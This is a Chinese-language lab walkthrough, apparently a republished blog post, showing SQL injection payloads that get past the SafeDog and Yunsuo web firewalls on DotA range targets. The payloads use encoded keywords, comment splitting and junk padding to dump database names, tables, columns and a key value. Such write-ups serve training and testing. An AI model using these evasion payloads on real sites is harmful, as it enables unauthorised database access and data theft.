前言
WAF作業原理
在實際的滲透測驗程序中,經常會碰到網站存在WAF的情況,網站存在WAF,意味著我們不能使用安全工具對網站進行測驗,因為一旦觸碰了WAF的規則,輕則丟棄報文,重則拉黑IP,所以,我們需要手動進行WAF的繞過,而繞過WAF前肯定需要對WAF 的作業原理有一定的理解,
WAF繞過之SQL注入繞過安全狗
先隨便輸入一個雙引號來顯示報錯閉合的陳述句
http://120.25.24.45:31832/?id=1"
http://120.25.24.45:31832/?id=1")--+
http://120.25.24.45:31832/?id=1")/*asifnjanf*/%2561%256e%25641=2--+
這里解釋一下%2561%256e%2564這個就是and的url編碼,可以去bp轉一下
/**/ 這個就是SQL注入行內注釋符,繞WAF有時候會用到的
它的報錯資訊是Unknown column '6e' in 'where clause' 意思是不存在6個列欄位
http://120.25.24.45:31832/?id=1")/*asifnjanf*/OrDEr%23%0aby/*asifnjanf*/3--+
這里來確定它的欄位數為3列
http://120.25.24.45:31832/?id=-1%22) union%23%0a all select/*safaqwf*/1,database(%23%0a),group_concat(schema_name) /*asdnuqw*/from information_schema.schemata--+
這里有一個細節,就是id=后面的加上一個負號,就是不顯示前面的結果
爆出所有資料庫,我們要選擇目標資料庫dotaxueyuan
http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(table_name)%20/*asdnuqw*/from%20information_schema.tables where table_schema='dotaxueyuan'--+
爆出表名,目標表名是key
http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(column_name)%20/*asdnuqw*/from%20information_schema.columns where table_name='key'--+
爆出列名key
http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(`key`)%20/*asdnuqw*/from%20dotaxueyuan.key--+
爆出key值
SQL注入繞過云鎖
先隨便輸入一個單引號來顯示報錯閉合的陳述句
http://120.25.24.45:30550/?id=1'
http://120.25.24.45:30550/?id=1'--+
http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0a%2561%256e%25641=2--+
這里解釋一下111111111111111111111這么一大串數字1就是運用SQL注入之垃圾資料繞過的原理,%2561%256e%2564這個就是and的url編碼,可以去bp轉一下
/**/ 這個就是SQL注入行內注釋符,繞WAF有時候會用到的
%23%0a這個URL解碼就是#號和換行,也可以說是一個繞過姿勢
它的報錯資訊是Unknown column '6e' in 'where clause' 意思是不存在6個列欄位
http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0aOrder%23%0a/*qweqwd*/by/*dasasdsaddac*/3--+
判斷欄位數,這個題的欄位數為3,它這題如果你輸入正確的陳述句是不會回顯的
http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),3--+
爆出目標資料庫dotaxueyuan
http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(table_name) from information_schema.tables where table_schema=%27dotaxueyuan%27--+
爆出表名,目標表名是key
http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(column_name) from information_schema.columns where table_name=%27key%27--+
爆出列名key
http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(`key`) from dotaxueyuan.key--+
爆出key值
靶場鏈接來自于東塔攻防世界靶場
https://labs.do-ta.com/index/course/index?one=15&two=17&three=51&level=-1&other=-1&title=
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/274168.html
標籤:其他
上一篇:單例的幾種實作方式